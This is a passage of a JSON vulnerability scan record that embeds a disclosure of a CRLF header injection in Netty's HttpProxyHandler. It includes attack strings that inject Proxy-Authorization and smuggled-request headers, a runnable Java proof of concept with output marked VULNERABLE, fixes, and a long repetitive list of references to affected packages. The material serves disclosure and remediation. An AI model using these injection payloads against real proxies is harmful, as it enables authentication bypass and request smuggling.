{\n        req.headers().add(outboundHeaders);  // <-- USER HEADERS ADDED WITHOUT VALIDATION\n    }\n\n    return req;\n}\n```\n\nThe `outboundHeaders` parameter comes from the `HttpProxyHandler` constructor (lines 80-93, 99-127), which is supplied by application code.\n\n### Incomplete Fix of GHSA-84h7-rjj3-6jx4\n\n**This vulnerability represents an incomplete fix of the previously acknowledged security advisory [GHSA-84h7-rjj3-6jx4](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4).**\n\nThe GHSA-84h7-rjj3-6jx4 fix addressed HTTP CRLF injection by adding URI validation via `validateRequestLineTokens()` in `DefaultHttpRequest` and enabling header validation by default through `DefaultHttpHeadersFactory`. However, `HttpProxyHandler` **explicitly opts out** of the fix by calling `withValidation(false)`, creating a gap where:\n\n1. The GHSA-84h7-rjj3-6jx4 fix's header validation is bypassed\n2. User-provided `outboundHeaders` are added without any CRLF check\n3. 
The resulting CONNECT request contains unvalidated headers on the wire\n\nThis is not a new vulnerability class \u2014 it is the **same CRLF injection** that GHSA-84h7-rjj3-6jx4 was supposed to fix, but `HttpProxyHandler` was missed during the remediation. The fix for GHSA-84h7-rjj3-6jx4 should be extended to cover this code path.\n\n## 4. Exploitability Prerequisites\n\nThis vulnerability is exploitable when:\n\n1. An application uses `HttpProxyHandler` with user-influenced `outboundHeaders`\n2. The application does not perform its own CRLF sanitization on header values\n\n**Common affected patterns**:\n- HTTP proxy clients that forward user-specified custom headers\n- Web scraping frameworks that allow users to set proxy headers\n- API gateways that pass user headers through a proxy tunnel\n\n## 5. Attack Scenarios\n\n### Scenario 1: Proxy Authentication Bypass\n\n```java\nHttpHeaders headers = new DefaultHttpHeaders(false);\nheaders.set(\"X-Forwarded-For\", userInput);  // userInput from attacker\nnew HttpProxyHandler(proxyAddr, headers);\n```\n\n**Attack input**: `userInput = \"1.2.3.4\\r\\nProxy-Authorization: Basic YWRtaW46YWRtaW4=\"`\n\n**Wire format**:\n```\nCONNECT target.com:443 HTTP/1.1\nhost: target.com:443\nX-Forwarded-For: 1.2.3.4\nProxy-Authorization: Basic YWRtaW46YWRtaW4=    <-- INJECTED\n```\n\nThe injected `Proxy-Authorization` header may override or supplement the original authentication, potentially granting access to a restricted proxy.\n\n### Scenario 2: Request Smuggling via Proxy\n\n**Attack input**: `userInput = \"value\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nGET /internal HTTP/1.1\\r\\nHost: internal-service\"`\n\nInjects a full smuggled request through the proxy tunnel establishment.\n\n## 6. 
Proof of Concept\n\n### Full Runnable PoC Source Code (HttpProxyHeaderInjectionPoC.java)\n\n```java\nimport io.netty.buffer.ByteBuf;\nimport io.netty.channel.embedded.EmbeddedChannel;\nimport io.netty.handler.codec.http.*;\nimport java.nio.charset.StandardCharsets;\n\npublic class HttpProxyHeaderInjectionPoC {\n    public static void main(String[] args) {\n        System.out.println(\"=== Netty HttpProxyHandler Header Injection PoC ===\\n\");\n\n        // Simulate HttpProxyHandler.newInitialMessage() with validation=false\n        HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory()\n            .withValidation(false);\n\n        FullHttpRequest req = new DefaultFullHttpRequest(\n            HttpVersion.HTTP_1_1, HttpMethod.CONNECT,\n            \"target.com:443\",\n            io.netty.buffer.Unpooled.EMPTY_BUFFER, headersFactory, headersFactory);\n\n        req.headers().set(HttpHeaderNames.HOST, \"target.com:443\");\n\n        // Inject CRLF in header value\n        String malicious = \"1.2.3.4\\r\\nX-Forwarded-For: 127.0.0.1\\r\\nX-Admin: true\";\n        req.headers().set(\"X-Forwarded-For\", malicious);\n\n        // Encode to wire format\n        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestEncoder());\n        ch.writeOutbound(req);\n        ByteBuf out = ch.readOutbound();\n        String encoded = out.toString(StandardCharsets.UTF_8);\n        out.release();\n        ch.finishAndReleaseAll();\n\n        System.out.println(\"Wire format:\");\n        for (String line : encoded.split(\"\\n\", -1)) {\n            System.out.println(\"  \" + line.replace(\"\\r\", \"\\\\r\"));\n        }\n        System.out.println(\"Injected X-Admin: \" + encoded.contains(\"X-Admin: true\"));\n        System.out.println(\"VULNERABLE: \" +\n            (encoded.contains(\"X-Admin: true\") ? 
\"YES\" : \"NO\"));\n    }\n}\n```\n\n### PoC Execution Output (Verified on Netty 4.2.12.Final)\n\n```\n=== Netty HttpProxyHandler Header Injection PoC ===\n\n[TEST 1] outboundHeaders with CRLF (validation disabled)\n----------------------------------------------------------\n  Injected header value: \"1.2.3.4\\r\\nX-Forwarded-For: 127.0.0.1\\r\\nX-Admin: true\"\n  Header accepted: YES (validation disabled!)\n  Wire format:\n    CONNECT target.com:443 HTTP/1.1\\r\n    host: target.com:443\\r\n    X-Forwarded-For: 1.2.3.4\\r\n    X-Forwarded-For: 127.0.0.1\\r          <-- INJECTED\n    X-Admin: true\\r                        <-- INJECTED\n    \\r\n\n  Injected X-Admin header in wire: true\n  VULNERABLE: YES\n\n[TEST 2] validation=true vs validation=false comparison\n--------------------------------------------------------\n  With validation=true:\n    SAFE: Rejected - IllegalArgumentException\n  With validation=false:\n    VULNERABLE: Accepted CRLF in header value!\n    Stored value contains CRLF: true\n```\n\n## 7. Remediation Recommendations\n\n### Option 1: Remove withValidation(false)\n\n```java\n// Change HttpProxyHandler.java line 176 from:\nHttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory().withValidation(false);\n// To:\nHttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory();\n```\n\n### Option 2: Validate outboundHeaders Before Adding\n\n```java\nif (outboundHeaders != null) {\n    for (Map.Entry<String, String> entry : outboundHeaders) {\n        HttpUtil.validateHeaderValue(entry.getValue());\n    }\n    req.headers().add(outboundHeaders);\n}\n```\n\n## 8. Resources\n\n- [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection (**incomplete fix \u2014 this report**)](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)\n- [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers](https://cwe.mitre.org/data/definitions/113.html)",
      "recommendation": "Upgrade io.netty:netty-handler-proxy to version 4.1.133.Final or 4.2.13.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42578"
        },
        {
          "url": "https://github.com/advisories/GHSA-84h7-rjj3-6jx4"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#127d30db-65be-4014-8f67-a9f446f64976"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0a4a6715-a127-4bd8-a621-8035bc1ba7dd"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#1d0fe982-50cd-4735-92a9-c4646c835c85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#0661e2e5-255b-492c-a9d6-51d923d3a74c"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7270b9b7-e356-45d7-b41d-b305b64ca884"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#489ff162-8c6a-4779-8c01-a86b0505533c"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#934abc77-d49d-4deb-ad57-3297623a5749"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#99eab6cb-5208-4202-bdd6-21e37a37ad0a"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#4133d939-decc-4531-baec-ba1629f220ee"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#45e75480-be89-452e-b54a-503b52745e61"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#3d965ea3-6b2e-4ffc-9810-f3b3305d0aea"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#5cc60f2f-bea1-4cc3-9471-17f699638e00"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0fb5e9db-8642-4902-985b-5e8322d916f3"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#20c012a5-2fa0-452b-b021-9d12a895f487"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
